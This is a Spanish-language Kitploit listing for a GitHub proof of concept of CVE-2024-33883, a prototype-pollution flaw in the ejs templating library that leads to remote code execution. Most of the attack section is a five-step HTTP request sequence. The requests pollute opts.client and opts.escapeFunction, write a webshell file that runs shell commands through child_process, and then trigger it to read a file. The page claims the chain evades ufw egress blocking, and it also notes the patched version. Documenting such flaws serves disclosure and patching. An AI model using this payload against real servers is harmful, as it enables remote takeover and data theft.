Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/grantzile/poc-cve-2024-33883
Análisis de VulnerabilidadesAnálisis de CódigoExplotaciónExplotación de Aplicaciones WebAprendizaje y EducaciónDesarrollo de Payloads
GitHubgrantzile/poc-cve-2024-33883

PoC-CVE-2024-33883

PoC de CVE-2024-33883, vulnerabilidad de RCE de ejs.

Ver Repositorio
52hace 2 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2024-33883

[email protected], Validación insuficiente de Prototype Pollution que conduce a explotación RCE

  • Con prototype pollution, establece opts.client a un valor verdadero (condición)
  • Luego, cuando render() se ejecuta, ejs ejecutará el valor de opts.escapeFunction como código JS.

Rango de código vulnerable

Basado en [email protected]

1. ejs/lib/ejs.js - línea 580, 636, 637

PoC (Inyectar webshell y activarla)

root@kitploit:~
1. GET /pollute?target=client&value=1

2. GET /pollute?target=escapeFunction&value=process.mainModule.require("fs").writeFileSync('./payload.js', "function RCE( key ){ \n const result = process.mainModule.require('child_process').execSync(`${key}`); \n throw new Error(`Result leak from Error: ${result.toString()}`); \n}\n module.exports = RCE;");

3. GET /
- Inyectar webshell

4. GET /pollute?target=escapeFunction&value=process.mainModule.require("./payload.js")("cat ./Leak_target");

5. GET /
- Activar webshell
  • El PoC anterior puede evadir la caída de paquetes salientes del firewall ufw.

  • Todas las versiones anteriores a 3.1.10 son vulnerables a este tipo de ataque.

  • Esto es una vulnerabilidad RCE, y no abuses de ella en servidores en producción.

Condiciones para que el ataque esté disponible

  1. Necesita control de render().
  2. Necesita control del vector de ataque de prototype pollution.
  • Si se cumplen las dos condiciones anteriores, el ataque RCE está disponible.

¿Cómo puedo prevenir este ataque?

  • La versión corregida ([email protected]) ya está disponible.
Descargar herramienta